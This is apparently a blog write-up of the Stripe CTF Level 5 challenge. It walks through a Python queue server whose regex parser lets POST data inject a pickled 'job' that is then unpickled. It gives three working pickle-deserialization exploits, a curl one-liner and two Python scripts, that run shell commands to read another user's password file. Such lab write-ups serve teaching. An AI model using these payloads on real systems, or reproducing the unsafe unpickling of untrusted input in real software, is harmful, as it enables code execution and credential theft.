Stripe CTF – Level 5

Note: For more information on this series of posts and the CTF exercise, please read the Background section of the first post in this series.

Level 05

Okay, we’re getting closer the elusive flag.  Just two levels left. Let’s see how we might be able to obtain the level06 credentials.  Login as level05 and take a peek at the /levels directory.


Note: You’ll notice that the file attributes for level05 are different than they appeared in previous posts. This was because I didn’t look closely at all of the binaries for each level when I initially set up the server. So when I reached level05, even though I had the suid bit set on the “binary”, it is actually a python script thus the python interpreter won’t actually recognize the suid permisions. Thus I went ahead and changed the script to be strictly owned and group owned by level06, and then initiated the server and worker processes as the level06 user from the server side.

This challenge took me by surprise. I really enjoy python, but I’m not programming in it every day, so when I took my first glance I was a little nervous as no obvious vulnerabilities were popping out at me. This is common in the security analysis field and like any problem in life, it’s best to start from the beginning and be methodical about what to do next.  Here is the code, it’s rather long, so if you’d like to walk through it, click the filename to expand the section.


#!/usr/bin/env python
import logging
import json
import optparse
import os
import pickle
import random
import re
import string
import sys
import time
import traceback
import urllib

from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer

LOGGER_NAME = 'queue'
logger = logging.getLogger(LOGGER_NAME)
logger.addHandler(logging.StreamHandler(sys.stderr))

TMPDIR = '/tmp/level05'
class Job(object):
 QUEUE_JOBS = os.path.join(TMPDIR, 'jobs')
 QUEUE_RESULTS = os.path.join(TMPDIR, 'results')

def __init__(self):
 self.id = self.generate_id()
 self.created = time.time()
 self.started = None
 self.completed = None

def generate_id(self):
 return ''.join([random.choice(string.ascii_letters) for i in range(20)])

def job_file(self):
 return os.path.join(self.QUEUE_JOBS, self.id)

def result_file(self):
 return os.path.join(self.QUEUE_RESULTS, self.id)

def start(self):
 self.started = time.time()

def complete(self):
 self.completed = time.time()
class QueueUtils(object):
 @staticmethod
 def deserialize(serialized):
 logger.debug('Deserializing: %r' % serialized)
 parser = re.compile('^type: (.*?); data: (.*?); job: (.*?)$', re.DOTALL)
 match = parser.match(serialized)
 direction = match.group(1)
 data = match.group(2)
 job = pickle.loads(match.group(3))
 return direction, data, job

@staticmethod
 def serialize(direction, data, job):
 serialized = """type: %s; data: %s; job: %s""" % (direction, data, pickle.dumps(job))
 logger.debug('Serialized to: %r' % serialized)
 return serialized

@staticmethod
 def enqueue(type, data, job):
 logger.info('Writing out %s data for job id %s' % (type, job.id))
 if type == 'JOB':
 file = job.job_file()
 elif type == 'RESULT':
 file = job.result_file()
 else:
 raise ValueError('Invalid type %s' % type)

serialized = QueueUtils.serialize(type, data, job)
 with open(file, 'w') as f:
 f.write(serialized)
 f.close()
class QueueServer(object):
 # Called in server
 def run_job(self, data, job):
 QueueUtils.enqueue('JOB', data, job)
 result = self.wait(job)
 if not result:
 result = (None, 'Job timed out', None)
 return result

def wait(self, job):
 job_complete = False
 for i in range(10):
 if os.path.exists(job.result_file()):
 logger.debug('Results file %s found' % job.result_file())
 job_complete = True
 break
 else:
 logger.debug('Results file %s does not exist; sleeping' % job.result_file())
 time.sleep(0.2)

if job_complete:
 f = open(job.result_file())
 result = f.read()
 os.unlink(job.result_file())
 return QueueUtils.deserialize(result)
 else:
 return None
class QueueWorker(object):
 def __init__(self):
 # ensure tmp directories exist
 if not os.path.exists(Job.QUEUE_JOBS):
 os.mkdir(Job.QUEUE_JOBS)
 if not os.path.exists(Job.QUEUE_RESULTS):
 os.mkdir(Job.QUEUE_RESULTS)

def poll(self):
 while True:
 available_jobs = [os.path.join(Job.QUEUE_JOBS, job) for job in os.listdir(Job.QUEUE_JOBS)]
 for job_file in available_jobs:
 try:
 self.process(job_file)
 except Exception, e:
 logger.error('Error processing %s' % job_file)
 traceback.print_exc()
 else:
 logger.debug('Successfully processed %s' % job_file)
 finally:
 os.unlink(job_file)
 if available_jobs:
 logger.info('Processed %d available jobs' % len(available_jobs))
 else:
 time.sleep(1)

def process(self, job_file):
 serialized = open(job_file).read()
 type, data, job = QueueUtils.deserialize(serialized)

job.start()
 result_data = self.perform(data)
 job.complete()

QueueUtils.enqueue('RESULT', result_data, job)

def perform(self, data):
 return data.upper()
class QueueHttpServer(BaseHTTPRequestHandler):
 def do_GET(self):
 self.send_response(404)
 self.send_header('Content-type','text/plain')
 self.end_headers()

output = { 'result' : "Hello there! Try POSTing your payload. I'll be happy to capitalize it for you." }
 self.wfile.write(json.dumps(output))
 self.wfile.close()

def do_POST(self):
 length = int(self.headers.getheader('content-length'))
 post_data = self.rfile.read(length)
 raw_data = urllib.unquote(post_data)

queue = QueueServer()
 job = Job()
 type, data, job = queue.run_job(data=raw_data, job=job)
 if job:
 status = 200
 output = { 'result' : data, 'processing_time' : job.completed - job.started, 'queue_time' : time.time() - job.created }
 else:
 status = 504
 output = { 'result' : data }

self.send_response(status)
 self.send_header('Content-type','text/plain')
 self.end_headers()
 self.wfile.write(json.dumps(output, sort_keys=True, indent=4))
 self.wfile.write('\n')
 self.wfile.close()

def run_server():
 try:
 server = HTTPServer(('127.0.0.1', 9020), QueueHttpServer)
 logger.info('Starting QueueServer')
 server.serve_forever()
 except KeyboardInterrupt:
 logger.info('^C received, shutting down server')
 server.socket.close()

def run_worker():
 worker = QueueWorker()
 worker.poll()

def main():
 parser = optparse.OptionParser("""%prog [options] type""")
 parser.add_option('-v', '--verbosity', help='Verbosity of debugging output.',
 dest='verbosity', action='count', default=0)
 opts, args = parser.parse_args()
 if opts.verbosity == 1:
 logger.setLevel(logging.INFO)
 elif opts.verbosity >= 2:
 logger.setLevel(logging.DEBUG)

if len(args) != 1:
 parser.print_help()
 return 1

if args[0] == 'worker':
 run_worker()
 elif args[0] == 'server':
 run_server()
 else:
 raise ValueError('Invalid type %s' % args[0])

return 0

if __name__ == '__main__':
 sys.exit(main())

First, I had to step through the code to get a good feel for exactly what was going on. I won’t delve into too much detail about the intended functionality of the program, but in general the script has two primary components – the server process and the worker process.

The server process opens an HTTP web listener on port 9020 and basically handles GET and POST requests. If it sees a GET request, it provides the user with instructions to send a POST request with some data to be capitalized. When it receives the POST request, it submits a job for the worker process to handle the data. Thus the worker process is constantly polling the “jobs” directory for jobs to process, and when it finds them, it proceeds to parse the data and spit out the result. Simple enough, but I was still having trouble identifying the vulnerability (it was probably much more obvious to some).  I went ahead and ran a test of the program with normal data to get a feel for how it works.

So one thing that I initially took notice to was that there doesn’t appear to be any input validation from the POST data, so we should have some flexibility there. The next thing I did was to trace what happens to the data as it progresses through the program. Basically our data gets passed around to different functions, and then serialized/desearialized using the pickle API. One line of code that initially stood out to me was line 54 where our data is about to be deserialized:

parser = re.compile(‘^type: (.*?); data: (.*?); job: (.*?)$’, re.DOTALL)

This is a simple regular expression command that parses our data for the specific patterns and returns three match groups accordingly. What I found of interest is that it’s assuming that the “data” field does not have the string “; job: ” contained within it. Otherwise, if we include that character sequence in our data the parser will submit our string to the final match group as opposed to the intended “job” string.

Okay, so what is supposed to happen with the “job” data? On line 58 it gets sent to the pickle.loads method. Note that the script assumes this is the same data that was sent to the pickle.dumps method on line 63, during serialization. So that seems to be about the only place in the program where we might direct some unintended functionality. Researching the pickle module (http://docs.python.org/library/pickle.html) a little bit more identifies an interesting warning that should peak our interest:

“Warning: The pickle module is not intended to be secure against erroneous or maliciously constructed data. Never unpickle data received from an untrusted or unauthenticated source.”

Ahh, but it appears that this program is unpickling data from an “untrusted” source. So let’s figure out how to exploit this. Googling for “python pickle vulnerabilities” leads us to some interesting articles:
http://blog.nelhage.com/2011/03/exploiting-pickle/
http://penturalabs.wordpress.com/2011/03/17/python-cpickle-allows-for-arbitrary-code-execution/
http://nadiana.com/python-pickle-insecure

These articles all discuss ways to exploit the vulnerabilities inherent to pickle.

Okay, so now we know the vulnerability. It seems likely that we can get the server to spit out the password for level06 for us. We just need to generate the correct exploit string and pass it through our post request. I used the articles mentioned earlier as a guide for generating these exploits.

Now it took me quite a bit of fiddling around with the correct exploit string. Primarily I had to get it to actually print the correct data in the post request. This was one of those trial and error experiences that can get frustrating but is worth it in the end. After getting the correct string to work, I also generated a few other options based on examples of pickle exploits seen during my research.  Below are the three solutions I came up with.

Solution 1:

 curl http://localhost:9020 -d "; job: $(printf "cos\nsystem\n(S'cat /home/level06/.password > /tmp/level6pw1'\ntR.")" 

Solution 2:


#!/usr/bin/python
 import pickle
 import subprocess
 import os, sys

class exploit(object):
 def __reduce__(self):
 return (subprocess.Popen,
 (('/bin/sh', '-c',
 'cat /home/level06/.password > /tmp/level6pw2'),))

job = pickle.dumps(exploit())
 mystring = 'curl http://localhost:9020 -d \"; job: $(printf \"' + job + '\")\"'
 os.system(mystring)

Solution 3:


#!/usr/bin/python
 import pickle
 import subprocess
 from urllib import urlopen

class exploit(object):
 def __reduce__(self):
 return (subprocess.Popen,
 (('/bin/sh', '-c',
 'cat /home/level06/.password > /tmp/level6pw3'),))

job = pickle.dumps(exploit())
 urlopen('http://localhost:9020','; job: ' + job)

Here is a screenshot of running the three different exploits.  Notice that they are each handled a little differently, but still produce the same result:

Sure enough we can validate that all three exploits succeeded and generated the correct result.

Conclusion

This was a little more challenging for me as I wasn’t aware of the pickle module and its vulnerabilities prior to this exercise. But that is what is great about these kinds of challenges. They force you to learn something new and research ways to break things that you didn’t know you could break.

Go ahead and save your password, and let’s see if we can finally capture that flag!